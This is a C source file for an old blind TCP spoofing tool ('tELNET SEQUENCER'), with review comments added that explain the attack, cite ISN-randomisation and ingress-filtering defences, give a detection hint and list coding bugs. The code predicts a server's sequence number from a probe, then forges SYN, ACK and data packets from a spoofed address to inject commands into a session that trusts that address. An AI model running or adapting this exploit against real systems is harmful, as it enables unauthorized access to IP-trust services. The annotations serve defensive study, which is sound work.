📄 telspoof.c
/* */
/* tELNET SEQUENCER v0.0001 = DEVELOPED BY VECT0R-X */
/* Under Solaris try: */
/* gcc x.c -lsocket -lnsl -L/usr/ucblib -lucb */

/*
 * Review summary.
 *
 * What the visible code does: it sends one SYN from the local address to
 * <server>:<port>, reads the sequence number from the reply, adds a fixed
 * offset (128000 or 64000, chosen by argv[4]) to guess the server's next
 * initial sequence number, resets the probe connection, and then sends a
 * SYN, an ACK and data segments whose source address is <spoof>.  The
 * replies to the spoofed segments are never read; the ACK number is the
 * guess.
 *
 * Why it matters to a defender: the guess can only be right when the
 * server's ISN advances by a constant per connection.  ISN generation as
 * specified in RFC 6528 (which obsoleted RFC 1948) removes that
 * predictability, and source-address filtering at the network edge
 * (BCP 38 / RFC 2827) drops packets carrying a source address that does
 * not belong to the sender.  Services that trust a peer because of its IP
 * address are the asset at risk.
 *
 * Detection hint grounded in this file: the probe SYN and the spoofed SYN
 * use the same source port (sourceport) and the same client sequence
 * number (fakesequence), and the probe is torn down with an RST right
 * after the SYN/ACK.
 *
 * The helpers sendtcppacket(), gettcppacket(), openintf() and the globals
 * `ip` and `tcp` are not defined in this file; presumably they come from
 * the included tcpip.c -- confirm against that file.
 */
#include "tcpip.c"
#include <fcntl.h>
/*
 * IP_HDRINCL is undefined here and nothing visible in this file redefines
 * it, so the `#ifdef IP_HDRINCL` block in main() is compiled out.
 */
#undef IP_HDRINCL

/* Local TCP source port; main() adds getpid() to it. */
unsigned long sourceport = 1036;
/* dest/spoofed/src hold IPv4 addresses copied as 4 raw bytes; nseq is the guessed server sequence number. */
unsigned long dest, spoofed, src, nseq, tarport, temp;
/* Line buffer for interactive input and the pointer fgets() returns. */
char str[255], *string;
/* Receive buffer for gettcppacket(); also reused for gethostname(). */
char buf[4096];
/* NOTE(review): spoofdir has 10 bytes but main() strcat()s a 10-character literal plus NUL into it. */
char spoofdir[10], *spoofid;
char spoofbuf[42];
/* adder is the offset added to the observed sequence number; i is the option value for setsockopt. */
int len, rec, sen, i=1, adder=128000, stringlen=0;
int spooffd, spooflen;
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;

/*
 * Entry point.  Arguments: argv[1] server, argv[2] port, argv[3] address
 * to place in the source field, argv[4] offset selector ('2' selects
 * 64000, anything else keeps 128000).
 *
 * NOTE(review): `void main` is not a standard signature; `int main` is.
 */
void main(int argc, char *argv[])
{
    /* Client-side sequence number; derived from the pid, so it is not random. */
    unsigned long fakesequence = 408618+getpid();
    sourceport+=getpid();
    printf("tELNET SEQUENCE - Writtin by vect0rx.\n\n");
    if (argc != 5) {
        fprintf(stderr,"Usage: %s <server> <port> <spoof> {1|2}\n\n",argv[0]);
        fprintf(stderr," <server> - Site spoof is attempted on.\n");
        fprintf(stderr," <port> - Port to access on <server>.\n");
        fprintf(stderr," <spoof> - Host to appear from.\n");
        fprintf(stderr," 1 - Offset of 128000 (common).\n");
        fprintf(stderr," 2 - Offset of 64000 (not likely).\n\n");
        exit(1);
    }
    /* NOTE(review): atoi() reports no errors; a non-numeric or out-of-range port is accepted silently. */
    tarport = atoi(argv[2]);
    if (argv[4][0] == '2') adder=64000;

    /* Resolve argv[3]: dotted quad first, then a name lookup. */
    memset(&spoofedaddr,0,sizeof(spoofedaddr));
    spoofedaddr.sin_family = AF_INET;
    if ((spoofedaddr.sin_addr.s_addr = inet_addr(argv[3])) == -1) {
        if ((host = gethostbyname(argv[3])) == NULL) {
            printf("Unknown host %s.\n",argv[3]);
            exit(1);
        }
        spoofedaddr.sin_family = host->h_addrtype;
        /* NOTE(review): h_length is copied unchecked; the code assumes it fits sin_addr (4 bytes). */
        memcpy((caddr_t) &spoofedaddr.sin_addr,host->h_addr,host->h_length);
    }
    memcpy(&spoofed,(char *)&spoofedaddr.sin_addr.s_addr,4);

    /* Resolve argv[1] the same way. */
    memset(&addr,0,sizeof(addr));
    addr.sin_family = AF_INET;
    if ((addr.sin_addr.s_addr = inet_addr(argv[1])) == -1) {
        if ((host = gethostbyname(argv[1])) == NULL) {
            printf("Unknown host %s.\n",argv[1]);
            exit(1);
        }
        addr.sin_family = host->h_addrtype;
        /* NOTE(review): same unchecked h_length copy as above. */
        memcpy((caddr_t) &addr.sin_addr,host->h_addr,host->h_length);
    }
    memcpy(&dest,(char *)&addr.sin_addr.s_addr,4);

    /*
     * Two raw sockets: one to receive TCP, one to send.  Raw sockets
     * normally require elevated privilege, so restricting that privilege
     * limits who can run code like this.
     */
    if ((rec = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0) {
        perror("error: recv socket");
        exit(1);
    }
    if ((sen = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
        perror("error: send socket");
        exit(1);
    }
    /*
     * NOTE(review): this overwrites the descriptor just obtained, so the
     * raw send socket is never closed, and the result of openintf() is
     * not checked before use.
     */
    sen = openintf("sl0");
#ifdef IP_HDRINCL
    fprintf(stderr,"IP_HDRINCL is set\n");
    if (setsockopt(sen,IPPROTO_IP,IP_HDRINCL,(char *)&i,sizeof(i)) < 0) {
        perror("setsockopt IP_HDRINCL");
        exit(1);
    };
#endif
    /* NOTE(review): the return value of gethostname() is ignored. */
    gethostname(buf, 128);
    if ((host=gethostbyname(buf))==NULL) {
        fprintf(stderr, "Can't get my hostname!?\n");
        exit(1);
    }
    memcpy(&src,host->h_addr,4);

    /* Probe: a SYN from the real local address, used only to observe the server's sequence number. */
    sendtcppacket(sen, src, dest, &addr, TH_SYN, sourceport, tarport, fakesequence, 0, NULL, 0);
    for (;;) {
        /*
         * NOTE(review): the result of gettcppacket() is not used, and
         * neither ip->ihl nor the received length is validated before
         * the TCP header is read at buf+len.
         */
        gettcppacket(rec,buf,sizeof(buf));
        ip = (struct iphdr *) buf;
        if (ip->saddr != dest) continue;
        len = ip->ihl << 2;
        tcp = (struct tcphdr *) (buf+len);
        if (ntohs(tcp->th_dport)==sourceport && ntohs(tcp->th_sport)==tarport) {
            /* NOTE(review): the value comes off the wire, so ntohl() is the conversion that names the intent. */
            temp=htonl(tcp->th_seq);
            nseq=temp;
            nseq+=adder;
            /* NOTE(review): adder is an int but is printed with %lu (format/argument mismatch). */
            printf("Sequence returned is %lu, Offset is %lu\n", nseq, adder);
            /* Tear down the probe connection. */
            sendtcppacket(sen, src, dest, &addr, TH_RST, sourceport, tarport, fakesequence, 0, NULL, 0);
            break; /* out of for loop */
        }
    }

    /*
     * From here on every segment carries `spoofed` as its source address
     * and reuses sourceport and fakesequence from the probe.  No reply is
     * read; the fixed usleep() calls stand in for waiting on the peer.
     */
    sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_SYN,sourceport,
                  tarport,fakesequence,0,NULL,0);
    printf("SYN Devilered, Waiting on SYN/ACK reply.\n");
    fflush(stdout);
    usleep(10000);
    /* The ACK number is the guess (nseq + 1), not a value taken from a received segment. */
    sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK,sourceport,
                  tarport,++fakesequence,++nseq,NULL,0);
    printf("ACK Devilered, Assuming safe to send data.\n");
    fflush(stdout);
    usleep(5000);
    printf("Sending irc client handshake.\n");
    fflush(stdout);
    /*
     * NOTE(review): "./telnet.d" is 10 characters, so strcat() writes 11
     * bytes (with the terminator) into the 10-byte spoofdir: a one-byte
     * overflow into whatever follows it in memory.
     */
    strcat(spoofdir, "./telnet.d");
    spooffd = open(spoofdir, O_RDONLY);
    if (spooffd < 0) {
        perror("open: ");
        /* NOTE(review): exits with status 0 although this is a failure path. */
        exit(0);
    } else {
        /*
         * NOTE(review): the read() result is stored but never checked,
         * spoofbuf is not NUL-terminated when all 42 bytes are filled,
         * and strtok() returns NULL for an empty or delimiter-only
         * buffer, which strlen() below would dereference.  spooffd is
         * never closed.
         */
        spooflen = read(spooffd, spoofbuf, sizeof(spoofbuf));
        spoofid = strtok(spoofbuf, "\r\n");
    }
    stringlen = strlen(spoofid);
    /* First line of ./telnet.d is sent as the initial payload. */
    sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK|TH_PUSH,sourceport,
                  tarport,fakesequence,nseq,spoofid,stringlen);
    fakesequence+=stringlen;

    /* Each line typed on stdin is sent as one data segment; nseq is not advanced again. */
    for(;;) {
        printf("telnet:%s> ", argv[1]);
        fflush(stdout);
        /*
         * NOTE(review): fgets() returns NULL at end of input or on
         * error; strlen(NULL) is undefined behaviour and the loop has no
         * exit condition.
         */
        string = fgets(str, 255, stdin);
        stringlen = strlen(string);
        sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK|TH_PUSH,sourceport,
                      tarport,fakesequence,nseq,string,stringlen);
        fakesequence+=stringlen;
    }
}
/**/